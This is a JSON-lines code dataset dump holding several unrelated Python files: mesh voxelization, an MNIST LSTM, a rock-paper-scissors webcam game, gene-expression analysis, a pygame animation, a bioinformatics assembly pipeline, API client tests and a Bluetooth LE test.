meshUpper + 2.0 * spacing + spacingEps_p\n\n maxDim_spaced = maxDim + 4\n\n voxelsize_limit = 512\n if maxDim_spaced > voxelsize_limit :\n print(meshLower_spaced)\n print(meshUpper_spaced)\n print(\"=====\")\n for dim in range(3):\n if edges[dim] < (voxelsize_limit - 4) * spacing:\n continue # short edge, no need to chunk\n else:\n amount_to_cut = edges[dim] - (voxelsize_limit - 4) * spacing\n meshLower_spaced[dim] += amount_to_cut * 0.5\n meshUpper_spaced[dim] -= amount_to_cut * 0.5\n maxDim_spaced = voxelsize_limit\n\n # we shift the voxelization bounds so that the voxel centers\n # lie symmetrically to the center of the object. this reduces the\n # chance of missing features, and also better aligns the particles\n # with the mesh\n # ex. |1|1|1|0.3| --> |0.15|1|1|0.15|\n meshOffset = np.zeros((3))\n meshOffset[0] = 0.5 * (spacing - (edges[0] - (dx-1)*spacing))\n meshOffset[1] = 0.5 * (spacing - (edges[1] - (dy-1)*spacing))\n meshOffset[2] = 0.5 * (spacing - (edges[2] - (dz-1)*spacing))\n meshLower_spaced -= meshOffset;\n\n # original space\n #meshLower_spaced += meshLower0\n meshUpper_spaced = meshLower_spaced + maxDim_spaced * spacing + 2 * spacingEps_p\n\n #print(meshLower_spaced, meshUpper_spaced)\n #print(f'binvox -aw -dc -d {maxDim_spaced} -pb -bb {meshLower_spaced[0]} {meshLower_spaced[1]} {meshLower_spaced[2]} {meshUpper_spaced[0]} {meshUpper_spaced[1]} {meshUpper_spaced[2]} -t binvox {mesh_filename}')\n\n # voxelsize_limit = 512\n # if maxDim_spaced > voxelsize_limit :\n # import ipdb; ipdb.set_trace()\n # cutting_space = spacing * (maxDim_spaced -voxelsize_limit ) * 0.5\n # maxDim_spaced = voxelsize_limit\n # meshLower_spaced += cutting_space\n # meshUpper_spaced -= cutting_space\n\n # import ipdb; ipdb.set_trace()\n\n\n os.system(f'binvox -aw -dc -d {maxDim_spaced} -pb -bb {meshLower_spaced[0]} {meshLower_spaced[1]} {meshLower_spaced[2]} {meshUpper_spaced[0]} {meshUpper_spaced[1]} {meshUpper_spaced[2]} -t binvox {mesh_filename}')\n #print(meshLower_spaced, meshUpper_spaced)\n\n # binvox -aw -dc -d 5 -pb -bb -0.9 -0.4 -0.9 0.9 1.4 0.9 -t binvox {mesh_filename}\n #os.system(f\"binvox -aw -dc -d 5 -pb -bb -0.9 -0.4 -0.9 0.9 1.4 0.9 -t binvox {mesh_filename}\")\n\n # convert voxel into points\n\n with open(output_binvox_filename, 'rb') as f:\n m1 = binvox_rw.read_as_3d_array(f)\n\n\n\n adjusted_spacing = (maxDim_spaced * spacing + 2 * spacingEps_p)/maxDim_spaced\n x, y, z = np.nonzero(m1.data)\n points = np.expand_dims(meshLower_spaced, 0) + np.stack([(x + 0.5)*adjusted_spacing, (y + 0.5)*adjusted_spacing, (z + 0.5)*adjusted_spacing], axis=1)\n os.remove(output_binvox_filename)\n\n\n if remove_outofbbox_pts:\n\n bbox = mesh_ori.bounds\n lower_bound = bbox[0, :]\n upper_bound = bbox[1, :]\n\n idx = (points[:, 0] - upper_bound[0] <= 0) * (points[:, 0] - lower_bound[0] >= 0)\n idy = (points[:, 1] - upper_bound[1] <= 0) * (points[:, 1] - lower_bound[1] >= 0)\n idz = (points[:, 2] - upper_bound[2] <= 0) * (points[:, 2] - lower_bound[2] >= 0)\n\n points = points[idx*idy*idz]\n\n if visualization:\n # for visualization\n axis = trimesh.creation.axis(axis_length=1)\n pcd = trimesh.PointCloud(points)\n (axis + mesh_ori).show()\n (trimesh.Scene(pcd) + axis).show()\n\n return points\n\n","sub_path":"net_utils/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":11347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519442527","text":"import time\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# 设置GPU按需增长\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n# 用tensorflow 导入数据\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\nlr = 1e-3\ninput_size = 28 # 每个时刻输入的特征数量是28,即一行的数量\ntimestep_size = 28 # 28个时间时刻,即28行\nhidden_size = 256 # 隐含层的数量\nlayer_num = 2 # LSTMlayer层数\nclass_num = 10 # 最后输出的类别数目\ncell_type = 'lstm'\n\nX_input = tf.placeholder(tf.float32, [None, 784])\ny_input = tf.placeholder(tf.float32, [None, class_num])\nbatch_size = tf.placeholder(tf.int32, [])\nkeep_prob = tf.placeholder(tf.float32, [])\n\n# 搭建LSTM网络\n# **步骤1:RNN 的输入shape = (batch_size, timestep_size, input_size)\nX = tf.reshape(X_input, [-1, 28, 28])\n\n\n# ** 步骤2:创建 lstm 结构\ndef lstm_cell(cell_type, num_nodes, keep_prob):\n if cell_type == 'lstm':\n cell = tf.contrib.rnn.BasicLSTMCell(num_nodes)\n else:\n cell = tf.contrib.rnn.LSTMBlockCell(num_nodes)\n cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\n return cell\n\n\nmlstm_cell = tf.contrib.rnn.MultiRNNCell([lstm_cell(cell_type, hidden_size, keep_prob) for _ in range(layer_num)],\n state_is_tuple=True)\n# **步骤3:用全零来初始化state\ninit_state = mlstm_cell.zero_state(batch_size=batch_size, dtype=tf.float32)\n# **步骤4:方法一,调用 dynamic_rnn() 来让我们构建好的网络运行起来\n# ** 当 time_major==False 时, outputs.shape = [batch_size, timestep_size, hidden_size]\n# ** 所以,可以取 h_state = outputs[:, -1, :] 作为最后输出\n# ** state.shape = [layer_num, 2, batch_size, hidden_size],\n# ** 或者,可以取 h_state = state[-1][1] 作为最后输出\n# ** 最后输出维度是 [batch_size, hidden_size]\n# outputs, state = tf.nn.dynamic_rnn(mlstm_cell, inputs=X, initial_state=init_state, time_major=False)\n# h_state = state[-1][1]\n\n# # *************** 为了更好的理解 LSTM 工作原理,我们把上面 步骤6 中的函数自己来实现 ***************\n# # 通过查看文档你会发现, RNNCell 都提供了一个 __call__()函数,我们可以用它来展开实现LSTM按时间步迭代。\n# # **步骤4:方法二,按时间步展开计算\noutputs = list()\nstate = init_state\nwith tf.variable_scope('RNN'):\n for timestep in range(timestep_size):\n (cell_output, state) = mlstm_cell(X[:, timestep, :], state)\n outputs.append(cell_output)\nh_state = outputs[-1]\n\n# 上面 LSTM 部分的输出会是一个 [hidden_size] 的tensor,我们要分类的话,还需要接一个 softmax 层\n# 首先定义 softmax 的连接权重矩阵和偏置\n\n# 开始训练和测试\nW = tf.Variable(tf.truncated_normal([hidden_size, class_num], stddev=0.1), dtype=tf.float32)\nbias = tf.Variable(tf.constant(0.1, shape=[class_num]), dtype=tf.float32)\ny_pre = tf.nn.softmax(tf.matmul(h_state, W) + bias)\n\n# 损失和评估函数\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_input * tf.log(y_pre),axis=1))\ntrain_op = tf.train.AdamOptimizer(lr).minimize(cross_entropy)\n\ncorrect_prediction = tf.equal(tf.argmax(y_pre, 1), tf.argmax(y_input, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\nsess.run(tf.global_variables_initializer())\ncurrent = time.time()\nfor i in range(5000):\n _batch_size = 100\n X_batch, y_batch = mnist.train.next_batch(batch_size=_batch_size)\n cost, acc, _ = sess.run([cross_entropy, accuracy, train_op],\n feed_dict={X_input: X_batch, y_input: y_batch, keep_prob: 0.5, batch_size: _batch_size})\n if (i + 1) % 500 == 0:\n # 分 100 个batch 迭代\n test_acc = 0.0\n test_cost = 0.0\n N = 100\n for j in range(N):\n X_batch, y_batch = mnist.test.next_batch(batch_size=_batch_size)\n _cost, _acc = sess.run([cross_entropy, accuracy],\n feed_dict={X_input: X_batch, y_input: y_batch, keep_prob: 1.0,\n batch_size: _batch_size})\n test_acc += _acc\n test_cost += _cost\n print(\"step {}, train cost={:.6f}, acc={:.6f}; test cost={:.6f}, acc={:.6f}; pass {}s\".format(i + 1, cost, acc,\n test_cost / N,\n test_acc / N,\n time.time() - current))\n current = time.time()\n","sub_path":"RNN/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"432189528","text":"import json\nfrom os.path import join, dirname\nfrom os import environ\nfrom watson_developer_cloud import VisualRecognitionV3\n\nimport numpy as np\nimport cv2\nimport time\n\nimport sys\nimport time\n\nfrom random import randint\n\n'''\n'''\ndomain = [\"rock\", \"paper\", \"scissors\"]\nresult_p1_wins = \"Player 1 wins!\"\nresult_p2_wins = \"Player 2 wins!\"\n\n\ndef game_logic(player_1, player_2):\n if player_1 in domain and player_2 in domain:\n\n if player_1 == player_2:\n return (\"No winner!\")\n else:\n if player_1 == \"paper\":\n if player_2 == \"rock\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n\n if player_1 == \"rock\":\n if player_2 == \"scissors\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n\n if player_1 == \"scissors\":\n if player_2 == \"paper\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n else:\n return (\"Random error\")\n\n\ndef label_2_int(lbl):\n return {\n 'rock': 0,\n 'paper': 1,\n 'scissors': 2\n }[lbl]\n\n\ndef int_2_label(nmbr):\n return {\n 0: 'rock',\n 1: 'paper',\n 2: 'scissors'\n }[nmbr]\n\n\ndef random_play():\n number = randint(0, len(domain) - 1)\n label = int_2_label(number)\n return label;\n\n\ndef play_series(player_1, player_2):\n player_1_wins = 0\n player_2_wins = 0\n for i in range(len(player_1)):\n result = game_logic(player_1[i], player_2[i])\n print(str(i) + ' | player 1: ' + player_1[i] + '\\t player 2: ' + player_2[i] + '\\t | ' + result)\n if (result == result_p1_wins):\n player_1_wins = player_1_wins + 1\n if (result == result_p2_wins):\n player_2_wins = player_2_wins + 1\n print('\\nplayer 1: ' + str(player_1_wins) + ' win(s)\\t player 2: ' + str(player_2_wins) + ' win(s)')\n\n\ndef play_game(player_1):\n player_2 = [random_play() for i in range(len(player_1))]\n play_series(player_1, player_2)\n\n'''\n'''\n\ncap = cv2.VideoCapture(0)\nwidth = 1080\ncv2.namedWindow(\"frame\", 0)\ncv2.resizeWindow(\"frame\", width, 768)\n\nimage_path_name = 'images/shot.png'\n\n\ndef recognize(image_path_name):\n visual_recognition = VisualRecognitionV3('2016-05-20', api_key='api-key') #replace api-key \n # print(json.dumps(visual_recognition.classify(images_file='SteinTest.jpg'), indent = 2))\n\n\n path = join(dirname(__file__), image_path_name)\n with open(path, 'rb') as images_file:\n results = visual_recognition.classify(images_file=images_file,\n classifier_ids=[\n 'SchereSteinPapier_1275869923'])\n\n return results\n\n\ndef log(j):\n j['images']\n\n# play_game(['scissors', 'rock', 'rock', 'rock', 'paper'])\n\ntr = {}\ntr['Stein'] = 'rock'\ntr['Schere'] = 'scissors'\ntr['Papier'] = 'paper'\n\nwhile (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('s'):\n ts = time.time()\n r = 1080.0 / frame.shape[1]\n dim = (1080, int(frame.shape[0] * r))\n\n # perform the actual resizing of the image and show it\n resized = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n cv2.imwrite(image_path_name, resized)\n\n results = recognize(image_path_name)\n\n # print(json.dumps(results, indent=2))\n\n if results['images'][0].get('classifiers'):\n res = results['images'][0]['classifiers'][0]['classes'][0]['class']\n player_1 = tr[res]\n play_game([player_1])\n else:\n print('Nix gefunden, kein Spiel möglich')\n # print(res)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n\n# image_name = 'SteinTest.jpg'\n# results = recognize(image_name)\n# print(json.dumps(results, indent=2))\n\n","sub_path":"RPS.py","file_name":"RPS.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"503384494","text":"import numpy as np\nimport sklearn.preprocessing as SP\n\nfrom VisualisationMethods import ExpressionDifferencePlotting as EDP\nfrom DataExtraction import GeneDataExtraction as GDE, SkinDataExtraction as SDE, ProcessExtraction as PE\nfrom StatisticalAnalysisMethods import RelationTesting as RT, SignificanceExtraction as SE\n\n\"\"\"\nPsoriasis GSE13355 180 NN = Normal, PN = Non-Lesional, PP = Lesional\n GSE30999 170 No normal patients\n GSE34248 28 No normal patients\n GSE41662 48 No normal patients\n GSE78097 33 Different: Normal (0), Mild (1), Severe Psoriasis (2)\n GSE14905 82 \nAtopic dermatitis GSE32924 33 \n GSE27887 35 Different: Pre NL (0), Post NL (1), Pre L (2), Post L (3)\n GSE36842 39 Also tested difference between Acute (2) and Chronic (3) Dermatitis\n\n\"\"\"\n\ndata_names = ['GSE13355','GSE30999','GSE34248','GSE41662','GSE78097','GSE14905','GSE32924','GSE27887', 'GSE36842']\n\nsuitable_names = ['GSE13355','GSE30999','GSE34248','GSE41662','GSE14905']\n\n# Extract the data\nprint(\"Extracting data...\")\nsample_values, skin_type_values, gene_ids = SDE.extract_multiple_data_sets(suitable_names)\ngene_set = GDE.extract_gene_data()\n\n# Only use the significant values\nprint(\"Calculating significant values...\")\nsign_values, sign_skin_types, sign_gene_ids = SE.extract_significant_genes(sample_values, skin_type_values, gene_ids,\n target_groups=[1, 2], threshold=0.001,\n relation_groups='unequal variance', sorting=True)\n\n# Scale the values\nprint(\"Scaling the significant values...\")\nvalues = np.array(sign_values)\nscaler = SP.StandardScaler()\nstand_values = scaler.fit_transform(values)\n\ntesting = \"Process\"\n# testing = \"Cellular\"\n# testing = \"Molecular\"\n\n# Find all processes\nprint(\"Finding all %s relations...\" % testing)\nprocesses, process_genes = PE.extract_processes(sign_gene_ids, gene_set, relation_type=testing)\n\nfor process in processes:\n if \"response to oxidative stress\" in process:\n print(process)\n\n# Averaging results\nNL_avg = np.average(stand_values[:, :210], 1)\nL_avg = np.average(stand_values[:, 210:], 1)\n\n# Find significance between processes\nprint(\"Remove insignificant %s aspects...\" % testing)\nprocesses, sign_values = RT.remove_insignificant_processes(processes, process_genes, sign_gene_ids, L_avg, NL_avg,\n ordering=True, sign_threshold=0.01)\n\n# Plotting the division of processes\nprint(\"Plotting the different %s aspects...\" % testing)\nEDP.plot_multiple_processes(processes, process_genes, sign_gene_ids, L_avg, NL_avg, frame_size=3)","sub_path":"Testing/SkinDiseaseTesting/ProcessClustering.py","file_name":"ProcessClustering.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"386251241","text":"# 20K1026 日比野将己\n# 第12回-課題[2-2]\n# --------------------------\n# プログラム名: ex12-2-bouncing-2.py\n\nimport pygame # モジュールのインポート\n\nFPS = 60 # 毎秒のフレーム数\nLOOP = True # ループの判定\nGRAVITY = 0.5 # 重力\nd = 70 # ボールの大きさ\n\nRED = (255, 0, 0) # 黄色\nWHITE = (255, 255, 255) # 白\n\n\ndef draw_ball(screen, x, y, radius=10): # ボールの描写関数\n pygame.draw.circle(screen, RED, (x, y), radius) # ディスプレイに黄色で(x,y)に大きさ10の円を描写\n\n\nscreen = pygame.display.set_mode((700, 500)) # ディスプレイの生成\nscreen.fill(WHITE) # 背景色を白に\nimage = pygame.Surface((100, 100)) # 画像描写用の Surface(仮想画面)を生成\nbackground = pygame.image.load(\"hosei.jpg\") # 背景画像を読み込む\nbackground = pygame.transform.scale(background, (600, 400)) # 背景画像を縮小(判定が分かりやすいようにディスプレイより小さくした)\nball = pygame.image.load(\"eco.jpg\") # ボール画像を読み込む\nball = pygame.transform.scale(ball, (d, d)) # ボールを縮小\nball = ball.convert() # 画像を変換する\nball.set_colorkey(ball.get_at((0, 0))) # 左上の(0,0)を背景色に指定\nclock = pygame.time.Clock() # 時計オブジェクト(こいつで FPS の遅延をかける)\n\nx, y = (100, 100) # ボールの初期位置\nvx, vy = (5, 10) # ボールの速度x,y\n\nwhile LOOP: # 描写のループ\n for event in pygame.event.get(): # イベントが起こっ���ときに来る\n if event.type == pygame.QUIT: # もし閉じるボタンが押されたら\n LOOP = False # ループを終わる\n clock.tick(FPS) # 毎秒の呼び出し回数(フレームレート)\n x += vx # ボールのx座標移動\n vy += GRAVITY # 重力付加\n y += vy # ボールのy座標移動\n if not (0 <= x <= 600 - d): # もしディスプレイの左右内じゃなかったら\n vx = -vx # ボールを反射させる\n if not (0 <= y + d <= 400): # もしディスプレイの上下内じゃなかったら\n vy = -vy * 0.99 # ボールを反射させる\n y = 400 - d # ボールの下を背景画像の下にする(入り込み防止)\n # draw_ball(screen, x, y) # ボールの描写\n screen.blit(background, (0, 0)) # ディスプレイに背景画像を転送\n screen.blit(ball, (x, y)) # 背景画像上にボールを転送\n pygame.display.flip() # 描写の反映\n screen.fill(WHITE) # 塗りつぶし\n\npygame.quit() # 画面を閉じる\n","sub_path":"提出用/20K1026-日比野将己-ex12/ex12-2-bouncing-2.py","file_name":"ex12-2-bouncing-2.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"505604619","text":"from random import randint\n\n\ndef create_code(length = 4):\n global chars\n code_len = len(chars)\n code = ''\n for _ in range(length):\n index = randint(0, code_len - 1)\n code += chars[index]\n return code\n\n\ndef create_char():\n chars = []\n for char in range(65, 123):\n if char in range(91, 97):\n continue\n else:\n chars.append(chr(char))\n return [str(x) for x in range(10)] + chars\n\n\nif __name__ == '__main__':\n chars = create_char()\n code = create_code()\n print(code)\n","sub_path":"day-04/综合小练习/验证码.py","file_name":"验证码.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"295865337","text":"import os\nimport subprocess\nfrom copy import copy\n\ndef consensus(\n df_fusions,\n cwd,\n fastq_r1,\n fastq_r2\n ):\n '''\n fun runs subfunctions\n to extract reads supporting\n each fusion and then run\n spades.py to assembly the \n consensus sequence overlapping\n each fusion bp.\n\n paramenters:\n df_fusions=df of star fusion\n fastq_r1=sample r1 fastq file\n fastq_r2=sample r2 fastq file\n '''\n y = copy(df_fusions)\n \n f_r1_path = os.path.join(cwd, fastq_r1)\n f_r2_path = os.path.join(cwd, fastq_r2)\n\n y['bp_fastq'] = y.apply(\n extract_reads,\n r1=f_r1_path,\n r2=f_r2_path,\n axis=1\n )\n y['consensus'] = y.apply(\n assembly_reads,\n axis=1\n )\n return y\n\ndef extract_reads(\n row,\n r1,\n r2\n ):\n \"\"\"\n fun calls filterbyname.sh (bbmap)\n to extract read names from input\n file.\n\n paramenters:\n row = row from fusion df\n r1 = sample R1 pair-end FASTQ file\n r2 = sample R2 pair-end FASTQ file\n \"\"\"\n\n cwd = os.getcwd()\n ids_txt = row.read_ids_name\n ids_path = os.path.join(cwd, ids_txt)\n\n out_r1 = os.path.join(cwd, f\"{row.fusion_id}_r1.fastq\")\n out_r2 = os.path.join(cwd, f\"{row.fusion_id}_r2.fastq\")\n\n syscall = (\n f\"filterbyname.sh include=t in={r1} in2={r2} \"\n + f\"out={out_r1} out2={out_r2} names={ids_path}\"\n )\n\n subprocess.run(\n syscall,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True\n )\n\n return (out_r1, out_r2)\n\ndef assembly_reads(\n row\n ):\n \"\"\"\n fun calls spades.py and return\n assembled sequences or n.a.\n\n parameters:\n row=fusion df row\n input_r1=R1 pair-end read\n input_r2=R2 pair-end read\n \"\"\"\n input_r1, input_r2 = row.bp_fastq\n tmp_dir = f'{row.fusion_id}_spades'\n\n syscall = f\"spades.py --rna -o {tmp_dir} -1 {input_r1} -2 {input_r2}\"\n subprocess.run(\n syscall,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True,\n )\n\n cons_file = read_fasta(tmp_dir)\n return cons_file\n\ndef read_fasta(\n wd,\n fname=\"hard_filtered_transcripts.fasta\"\n ):\n \"\"\"\n fun reads fasta file and\n returns a list of contig\n sequences.\n \n parameters:\n wd = current working dir\n fname = spades.py sequences file name\n (harcoded)\n \"\"\"\n\n target = os.path.join(wd, fname)\n if os.path.exists(target):\n\n with open(target, \"r\") as fp:\n ifile = fp.read().split(\">\")\n #logging.debug(f\"total contigs in file: {len(ifile)}\")\n sequences = [\"\".join(seq.split(\"\\n\")[1:]) for seq in ifile if seq]\n else:\n #logging.debug(f\"total contigs in file: 0\")\n sequences = [\"n.a.\"]\n return sequences","sub_path":"get_contigs/make_consensus.py","file_name":"make_consensus.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"442676511","text":"from tsuruclient import client\n\nimport json\nimport httpretty\nimport unittest\n\n\nclass AppsTestCase(unittest.TestCase):\n def setUp(self):\n httpretty.enable()\n\n def tearDown(self):\n httpretty.disable()\n httpretty.reset()\n\n def test_list_apps(self):\n apps_data = []\n url = \"http://target/apps\"\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=json.dumps(apps_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n result = cl.apps.list()\n\n self.assertListEqual([], result)\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_get_app(self):\n app_data = {}\n url = \"http://target/apps/appname\"\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=json.dumps(app_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n result = cl.apps.get(\"appname\")\n\n self.assertDictEqual({}, result)\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_remove_app(self):\n url = \"http://target/apps/appname\"\n httpretty.register_uri(\n httpretty.DELETE,\n url,\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n cl.apps.remove(\"appname\")\n\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_create_app(self):\n app_data = {}\n url = \"http://target/apps\"\n httpretty.register_uri(\n httpretty.POST,\n url,\n body=json.dumps(app_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n data = {\n \"name\": \"appname\",\n \"framework\": \"framework\",\n }\n cl.apps.create(**data)\n\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n","sub_path":"tests/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"354536028","text":"#!/usr/bin/python3\n\nimport sys\nimport csv\n\nd1={}\nfor tup in sys.stdin:\n\ttup=eval(tup)\n\tkeytup=(tup[0],tup[1])\n\tif keytup not in d1.keys() :\n\t\td1.setdefault(keytup,[])\n\t\td1[keytup].append(tup[2])\n\t\td1[keytup].append(int(tup[3]))\n\telse:\n\t\td1[keytup][0]+=tup[2]\n\t\td1[keytup][1]+=int(tup[3])\n\n\nfor key in list(d1):\n\tif(d1[key][0]<6):\n\t\td1.pop(key)\n\n\nl1=sorted(d1.items(),key= lambda k1 : k1[0][0])\n\nl1.sort(key= lambda k2 : k2[1][0])\nl1.sort(key= lambda k3 : k3[1][1],reverse=True)\n\nfor i in l1:\n\tprint('%s,%s,%d,%d' % (i[0][0],i[0][1],i[1][1],i[1][0]))\n\t\n\t\t\t\n","sub_path":"adminmgr/media/code/python/red2/BD_212_945_952_reducer.py","file_name":"BD_212_945_952_reducer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"601283279","text":"# TP/CON/SLA/BV-38-C [Slave Data Length Update - maximum Transmit Data Channel\n# PDU length and time]\n#\n# Verify that the IUT as Slave correctly handles reception of an LL_LENGTH_REQ\n# PDU when supporting greater than the minimum allowed values for Transmit Data\n# Channel PDU length and time\n\nimport bluetool\nfrom bluetool.core import HCIDataTransCoordinator, HCIDataTransWorker, LEHelper\nimport bluetool.bluez as bluez\nimport bluetool.command as btcmd\nimport bluetool.event as btevt\nimport bluetool.error as bterr\nfrom bluetool.utils import bytes2str, htole16\n\nCONN_TIMEOUT_MS = 10000\n\n\nclass HCIVendorWriteLocalMaxRxOctets(btcmd.HCIVendorCommand,\n btcmd.CmdCompltEvtParamUnpacker):\n ocf = 0x85\n\n def __init__(self, local_max_rx_octets):\n super(HCIVendorWriteLocalMaxRxOctets, self).__init__()\n self.local_max_rx_octets = local_max_rx_octets\n\n def pack_param(self):\n return ''.join((htole16(self.local_max_rx_octets)))\n\nbtevt.register_cmd_complt_evt(HCIVendorWriteLocalMaxRxOctets)\n\n\nclass IUT(HCIDataTransWorker):\n def main(self):\n helper = LEHelper(self.sock)\n\n helper.reset()\n cmd = btcmd.HCILEWriteSuggestedDefaultDataLength(200, (200+14)*8)\n helper.send_hci_cmd_wait_cmd_complt_check_status(cmd)\n\n helper.start_advertising(0xA0)\n evt = helper.wait_connection_complete()\n if evt.status != 0:\n raise bterr.TestError(\n 'connection fail: status: 0x{:02x}'.format(evt.status))\n self.log.info('connect to %s', bytes2str(evt.peer_addr))\n conn_handle = evt.conn_handle\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n\n self.send(conn_handle)\n\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n self.wait() # Wait lower tester to finish data length update\n\n # Send ACL data\n self.test_acl_trans_send(CONN_TIMEOUT_MS / 1000)\n\n helper.disconnect(conn_handle, 0x13)\n helper.wait_disconnection_complete(conn_handle)\n\n\nclass LowerTester(HCIDataTransWorker):\n def main(self):\n peer_addr = self.recv()\n\n helper = LEHelper(self.sock)\n\n helper.reset()\n cmd = HCIVendorWriteLocalMaxRxOctets(100)\n helper.send_hci_cmd_wait_cmd_complt_check_status(cmd)\n\n helper.create_connection_by_peer_addr(0, peer_addr, 60, 0, 200, 50)\n evt = helper.wait_connection_complete()\n if evt.status != 0:\n raise bterr.TestError(\n 'connection fail: status: 0x{:02x}'.format(evt.status))\n self.log.info('connect to %s', bytes2str(evt.peer_addr))\n conn_handle = evt.conn_handle\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n\n self.send(conn_handle)\n\n helper.set_data_len(conn_handle, 251)\n helper.wait_le_event(bluez.EVT_LE_DATA_LEN_CHANGE)\n self.signal() # Trigger next step\n\n self.test_acl_trans_recv(CONN_TIMEOUT_MS / 1000)\n\n helper.wait_disconnection_complete(conn_handle, CONN_TIMEOUT_MS)\n\n\nclass TestManager(HCIDataTransCoordinator):\n def main(self):\n self.lt.send(self.iut.bd_addr)\n\n send_conn_handle = self.iut.recv()\n recv_conn_handle = self.lt.recv()\n\n # Wait lower tester data length update\n self.lt.wait()\n self.iut.signal()\n\n acl_list = self.create_test_acl_data(send_conn_handle, 1, 251)\n succeeded = self.test_acl_trans(self.iut, self.lt, recv_conn_handle,\n acl_list, CONN_TIMEOUT_MS / 1000)\n\n if succeeded:\n return 0\n return 1\n\n\nbluetest = {\n 'coordinator': TestManager,\n 'worker': [\n ('iut', IUT),\n ('lt', LowerTester)\n ]\n}\n\n\nif __name__ == \"__main__\":\n bluetool.log_to_stream()\n bluetool.run_config(bluetest, [0, 1])\n","sub_path":"test/ts/TP_CON_SLA_BV-37-C.py","file_name":"TP_CON_SLA_BV-37-C.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"650719065","text":"T=int(input())\r\nfor case_id in range(1,T+1):\r\n C,D,V = map(int,input().split())\r\n coins = list(map(int,input().split()))\r\n '''req = [1]\r\n while req[-1]*(D+1) <= V:\r\n req.append(req[-1]*(D+1))\r\n print(req)'''\r\n\r\n ans,do = 0,0\r\n while do < V:\r\n if len(coins)>0 and coins[0] <= do+1:\r\n do = C*coins[0] + do\r\n coins.pop(0)\r\n else:\r\n ans += 1\r\n do = C*(do+1) + do\r\n\r\n print('Case #%d: %d' % (case_id, ans))\r\n import sys\r\n print('Case #%d: %d' % (case_id, ans), file=sys.stderr)\r\n","sub_path":"solutions_5646553574277120_1/Python/Pred4c3/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"579717380","text":"from django.shortcuts import render\nfrom django.forms import forms,CharField,IntegerField,Em\n\n# Create your views here.\ntasks=[\n \"check email\",\n \"send money\",\n \"give rent\"\n]\nclass NewTask(forms.Form):\n addtask=CharField(label=\" Add Task :\",max_length=64)\n priority=IntegerField(label=\"Priority :\",min_value=2,max_value=17)\n\n\ndef index(request):\n return render(request,\"taskapp/index.html\",{\n \"tasks\":tasks\n })\n\ndef add(request):\n form=NewTask()\n return render(request,\"taskapp/add.html\",{\n \"form\":form\n })","sub_path":"first_django/taskapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"605668644","text":"'''Test message_unreact function'''\n# pylint: disable=W0622, W0401, W0614, C0103, W0621\nfrom ._include import *\n\ndef message_flags(msg_id, all_msg):\n '''check if message is reacted'''\n flag = 0\n for msg in all_msg:\n if msg['message_id'] == msg_id:\n flag = 1\n if msg['reacts'] != 1:\n flag = 2\n break\n break\n return flag\n\ndef test_channel_invalid_token():\n '''Invalid Token'''\n db.reset_DB()\n with pytest.raises(AccessError):\n 